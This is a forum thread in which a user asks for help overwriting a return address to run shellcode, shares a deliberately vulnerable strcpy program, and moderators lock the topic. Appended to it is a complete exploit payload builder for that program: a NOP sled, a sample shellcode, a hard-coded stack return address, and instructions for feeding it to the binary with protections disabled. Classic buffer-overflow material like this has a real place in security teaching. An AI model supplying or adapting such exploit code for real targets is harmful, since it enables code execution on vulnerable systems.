
modify the return address to shellcode

Posted: Tue Oct 21, 2014 2:05 pm
by hadi
I have two C programs. One is the shellcode and the other is the vulnerable program.

I want to change the return address without buffering the vulnerable program.

For example:
__asm__("movl $shellcode, 4(%ebp)");
But this method doesn't work for me. I have tried running the vulnerable program in Linux with gdb and redirecting the shellcode to it with "(gdb) run vuln < shellcode", but eip or ebp never change. Can someone look at my shellcode program and see where the error is?

Shellcode program:

#include <stdio.h>
#include <stdlib.h>

/* The function whose address is written over the saved return address.
 * The .byte directive is a placeholder for the real shellcode bytes. */
void shellcode(void) {
    __asm__(".byte 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90"); /* you may put your shellcode here */
    printf("hey guyz!\n");
    exit(0);
}

/* Overwrites bang()'s own saved return address with the address of shellcode().
 * 4(%ebp) is the return address only when compiled as 32-bit x86 with a frame
 * pointer (gcc -m32 -fno-omit-frame-pointer); on any other ABI this write
 * lands somewhere else. */
void bang(int val) {
    (void)val;
    __asm__("movl $shellcode, 4(%ebp)");
}

int main(void) {
    bang(0);
    return 0;
}
Vulnerable program:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/* Deliberately vulnerable: strcpy() copies argv[1] into a 1024-byte stack
 * buffer with no length check, so a longer argument runs over the saved
 * ebp and the saved return address above the buffer. */
int bof(char *string) {

    char buffer[1024];

    strcpy(buffer, string);

    return 1;
}

int main(int argc, char *argv[]) {

    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }

    bof(argv[1]);
    printf("Done..\n");

    return 1;
}

Re: modify the return address to shellcode

Posted: Tue Oct 21, 2014 3:16 pm
by Brynet-Inc
You asked this once before and the topic was locked.

Re: modify the return address to shellcode

Posted: Tue Oct 21, 2014 3:20 pm
by hadi
Hi Brynet-Inc,

I asked with a different method and different code. These are new.
If you have an answer, please share it with me.

Re: modify the return address to shellcode

Posted: Tue Oct 21, 2014 3:41 pm
by martinFTW
BTW I exploited sortie's dummy program and it really wasn't that hard.

Re: modify the return address to shellcode

Posted: Tue Oct 21, 2014 3:42 pm
by sortie
This is not the forum for you.

Your endeavours don't seem linked to hobbyist operating systems development (osdev). I recommend you find another forum.

Additionally, you don't speak English well. Your post makes no sense. Improve your English. Follow your guide, I assume you have one.

I believe your problem is that you don't understand what the ELF file format is; you are piping an ELF program into the vulnerable program. This isn't how things work. You completely didn't understand your guide.

I'm happy to discuss these security matters intelligently. I don't want to answer your impossible-to-answer questions.

As last time, locked.
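The input that overwrites bof()'s return address in the vulnerable program above is a raw byte string handed to it as argv[1], not a compiled second program (which is sortie's point about piping an ELF file). The following payload builder is an added example for this thread, not code from the original posts. It assumes a distance of 1032 bytes from buffer[0] to the saved return address (1024 bytes of buffer, 4 bytes of padding, 4 bytes of saved ebp), a hypothetical stack address 0xbffff5a0, and a constructed 5-byte stand-in for shellcode; the distance and address would have to be measured in gdb on the real binary.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Size of bof()'s buffer in the vulnerable program from the thread. */
#define BUF_SIZE 1024

/* ASSUMED distance from buffer[0] to the saved return address:
 * 1024 bytes of buffer, 4 bytes of compiler padding, 4 bytes of saved ebp.
 * The real value depends on the compiler and must be measured in gdb
 * (overflow with a recognisable pattern and read eip at the crash). */
#define ASSUMED_DIST_TO_RET (BUF_SIZE + 4 + 4)

/* HYPOTHETICAL address that lands somewhere inside the NOP sled on the stack. */
#define HYPOTHETICAL_RET_ADDR 0xbffff5a0u

/* Constructed stand-in for real shellcode: 32-bit Linux exit() system call
 * (xor eax,eax; inc eax; int 0x80). It only has to be NUL-free for this demo. */
static const uint8_t sample_shellcode[] = { 0x31, 0xc0, 0x40, 0xcd, 0x80 };

/* Returns 1 if any of the n bytes is 0x00, which would stop strcpy() early. */
int contains_nul(const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0)
            return 1;
    return 0;
}

/* Builds the string handed to the vulnerable program as argv[1]:
 *   [ NOP sled ][ shellcode ][ ret_addr, little-endian ]'\0'
 * The sled fills everything between buffer[0] and the shellcode, so any
 * ret_addr that lands in the sled slides forward into the code.
 * Returns the payload length (without the trailing NUL), or -1 when the
 * output buffer is too small, the shellcode does not fit, or the shellcode
 * or ret_addr contains a 0x00 byte (strcpy would stop copying there). */
long build_payload(uint8_t *out, size_t out_len, size_t dist_to_ret,
                   uint32_t ret_addr, const uint8_t *sc, size_t sc_len)
{
    size_t total = dist_to_ret + sizeof(uint32_t);
    uint8_t addr[sizeof(uint32_t)];

    if (out_len < total + 1 || sc_len > dist_to_ret)
        return -1;
    for (size_t i = 0; i < sizeof addr; i++)
        addr[i] = (uint8_t)(ret_addr >> (8 * i));   /* x86 is little-endian */
    if (contains_nul(sc, sc_len) || contains_nul(addr, sizeof addr))
        return -1;

    memset(out, 0x90, dist_to_ret - sc_len);          /* NOP sled */
    memcpy(out + dist_to_ret - sc_len, sc, sc_len);   /* shellcode */
    memcpy(out + dist_to_ret, addr, sizeof addr);     /* overwrites saved eip */
    out[total] = '\0';                                /* terminates strcpy */
    return (long)total;
}

int main(void)
{
    static uint8_t payload[ASSUMED_DIST_TO_RET + 8];
    long n = build_payload(payload, sizeof payload, ASSUMED_DIST_TO_RET,
                           HYPOTHETICAL_RET_ADDR,
                           sample_shellcode, sizeof sample_shellcode);
    if (n < 0) {
        fprintf(stderr, "payload contains a NUL byte or does not fit\n");
        return 1;
    }
    /* Raw bytes on stdout, so the caller can run: ./vuln "$(./payload)" */
    fwrite(payload, 1, (size_t)n, stdout);
    return 0;
}
```

The payload is passed as an argument, not on stdin, because bof() reads argv[1]. This classic return-to-stack layout only works when the vulnerable binary is built as 32-bit x86 with an executable stack and without a stack protector, and with ASLR disabled; otherwise the stack address changes between runs or the overwritten return address is detected before bof() returns.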